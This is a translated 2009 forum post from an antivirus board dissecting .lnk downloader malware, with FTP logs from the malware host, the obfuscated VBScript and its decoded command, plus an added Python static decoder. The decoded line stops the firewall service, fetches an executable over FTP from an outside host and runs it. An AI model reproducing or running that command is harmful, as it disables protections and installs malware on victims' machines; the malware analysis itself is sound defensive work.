[Discussion] lnk viruses seem to be going around lately......

Board: AntiVirus | Posted 17 years ago (2009/01/27 16:43) | Push/boo score: 1(104)
5 comments, 2 participants, latest thread 1/1
lnk viruses seem to be going around lately.
I opened a few.
For some, the server is empty after connecting, as in (1).
Others have a lot of content, as in (2).
These lnk files are downloaders (I tested a few and they do not damage the system by themselves), but the things they download.....
It regenerates the downloader (vbs), regenerates......

(1)
ftp> open www.g03z.com
Connected to www.g03z.com.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (www.g03z.com:(none)): aa33
331 User name okay, need password.
Password:bb33
230 User logged in, proceed.
ftp> ls
200 PORT Command successful.
550 No files found.

(2)
ftp> open www.g03z.com
Connected to www.g03z.com.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (www.g03z.com:(none)): 123
331 User name okay, need password.
Password:123
230 User logged in, proceed.
ftp> ls
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
busdh
busdh2.lnk
hdisf
hdisf3.lnk
ksjge
ksjge1.lnk
msvba2.lnk
msvbq
oqjsh
oqjsh5.lnk
qianlai
qianlai01.lnk......
226-Maximum disk quota limited to 102400 kBytes
    Used disk quota 0 kBytes, available 102400 kBytes
226 Transfer complete.
ftp: 297 bytes received in 0.01Seconds 29.70Kbytes/sec.

The content of busdh (i.e. the content of the vbs file):

crhc=array
(1672,1742,1760,1775,1691,1756,1757,1691,1720,1691,1726,1773,1760,1756,1775,
1760,1738,1757,1765,1760,1758,1775,1699,1693,1746,1774,1758,1773,1764,1771,
1775,1705,1742,1763,1760,1767,1767,1693,1700,1691,1672,1669,1756,1757,1705,
1773,1776,1769,1691,1693,1758,1768,1759,1691,1706,1758,1691,1769,1760,1775,
1691,1774,1775,1770,1771,1691,1774,1763,1756,1773,1760,1759,1756,1758,1758,
1760,1774,1774,1697,1760,1758,1763,1770,1691,1770,1771,1760,1769,1691,1778,
1778,1778,1705,1780,1756,1763,1770,1770,1771,1764,1758,1775,1776,1773,1760,
1707,1705,1758,1770,1768,1721,1721,1775,1705,1775,1697,1760,1758,1763,1770,
1691,1708,1709,1710,1721,1721,1775,1705,1775,1697,1760,1758,1763,1770,1691,
1708,1709,1710,1721,1721,1775,1705,1775,1697,1760,1758,1763,1770,1691,1762,
1760,1775,1691,1777,1705,1760,1779,1760,1691,1726,1717,1751,1777,1705,1760,
1779,1760,1721,1721,1775,1705,1775,1697,1760,1758,1763,1770,1691,1757,1780,
1760,1721,1721,1775,1705,1775,1697,1761,1775,1771,1691,1704,1774,1717,1775,
1705,1775,1697,1759,1760,1767,1691,1775,1705,1775,1697,1758,1717,1751,1777,
1705,1760,1779,1760,1697,1759,1760,1767,1691,1696,1778,1764,1769,1759,1764,
1773,1696,1751,1757,1776,1774,1759,1763,1705,1777,1757,1774,1697,1759,1760,
1767,1691,1758,1717,1751,1777,1705,1760,1779,1760,1697,1774,1775,1756,1773,
1775,1691,1763,1775,1775,1771,1717,1706,1706,1778,1778,1778,1705,1775,1775,
1761,1761,1715,1715,1711,1705,1758,1770,1768,1706,1766,1764,1769,1762,1705,
1765,1771,1762,1693,1703,1707,1672,1669)
for i=1 to UBound(crhc)
runner=runner&chr(crhc(i)-1659)
next
Execute runner

Converting the numbers above:

Set ab = CreateObject("Wscript.Shell")
ab.run "cmd /c net stop sharedaccess&echo open www.yahoopicture0.com>>t.t&echo 123>>t.t&echo 123>>t.t&echo get v.exe C:\v.exe>>t.t&echo bye>>t.t&ftp -s:t.t&del t.t&c:\v.exe&del %windir%\busdh.vbs&del c:\v.exe&start h ttp://www.ttff884.com/king.jpg",0

--
※ Posted from: 批踢踢實業坊 (ptt.cc)
◆ From: 59.112.7.187
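
The decoding step the post performs by hand ("converting the numbers above"), as an added example that is not part of the original post: a Python static decoder that recovers the string built by the array/chr-offset loop without running the script, plus a small triage over the commands seen in the decoded text. The function names, the BEHAVIOURS table and the sample script are assumptions constructed for illustration.

```python
import re

# Array literal such as: crhc=array(1672,1742,...), possibly wrapped over lines.
ARRAY_RE = re.compile(r"(\w+)\s*=\s*array\s*\(([\d,\s_]+)\)", re.I)

# Hypothetical triage table: behaviours visible in the post's decoded command line.
BEHAVIOURS = {
    "stops SharedAccess (Windows Firewall/ICS)": r"net\s+stop\s+sharedaccess",
    "scripted ftp download": r"ftp\s+-s:",
    "deletes its own script": r"\bdel\s+%windir%\\\w+\.vbs",
}

def decode_offset_array(vbs):
    """Recover the string a 'chr(arr(i) +/- N)' loop builds, without executing it."""
    m = ARRAY_RE.search(vbs)
    if not m:
        raise ValueError("no numeric array literal found")
    name = re.escape(m.group(1))
    values = [int(v) for v in re.findall(r"\d+", m.group(2))]
    shift = re.search(rf"chrw?\(\s*{name}\s*\(\s*\w+\s*\)\s*([+-])\s*(\d+)\s*\)", vbs, re.I)
    if not shift:
        raise ValueError("no chr(array(i) +/- N) expression found")
    offset = int(shift.group(2)) * (-1 if shift.group(1) == "-" else 1)
    # VBScript arrays are 0-based; 'for i=1' skips element 0, so honour the loop start.
    loop = re.search(rf"for\s+\w+\s*=\s*(\d+)\s+to\s+ubound\(\s*{name}\s*\)", vbs, re.I)
    start = int(loop.group(1)) if loop else 0
    chars = []
    for v in values[start:]:
        code = v + offset
        if not 0 <= code <= 0xFFFF:
            raise ValueError(f"value {v} decodes outside the character range")
        chars.append(chr(code))
    return "".join(chars)

def triage(decoded):
    """Return the labels of the known behaviours found in decoded script text."""
    return [label for label, pat in BEHAVIOURS.items() if re.search(pat, decoded, re.I)]

# Constructed sample: same obfuscation shape as the post's script, harmless payload.
_PLAIN = 'WScript.Echo "decoded"\r\n'
SAMPLE_VBS = (
    "crhc=array(" + ",".join(str(ord(c) + 1659) for c in "\r" + _PLAIN) + ")\n"
    "for i=1 to UBound(crhc)\nrunner=runner&chr(crhc(i)-1659)\nnext\nExecute runner\n"
)

if __name__ == "__main__":
    print(repr(decode_offset_array(SAMPLE_VBS)))
    print(triage("cmd /c net stop sharedaccess&ftp -s:t.t&del %windir%\\busdh.vbs"))
```

Because the decoder only parses text, a suspicious .vbs can be inspected on an analysis machine without wscript ever interpreting it.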

01/27 17:02, 1F
Such a lousy trick, just converting things back and forth, yet people still fall victim to it~ tsk tsk tsk~

01/28 12:04, 2F
v.exe, my dad got hit by it; I can't stop the old man from opening emails carelessly ~_~

01/28 12:04, 3F
What's more, they all think that email from friends/people they know should be fine.

01/28 12:05, 4F
Little do they know that this kind of psychological carelessness is exactly what makes mail sent by friends the most dangerous.

01/28 12:06, 5F
PS. Avast couldn't detect it even with yesterday's virus definitions; it was PCTools that blocked it Orz
Article ID (AID): #19Vib4Ge (AntiVirus)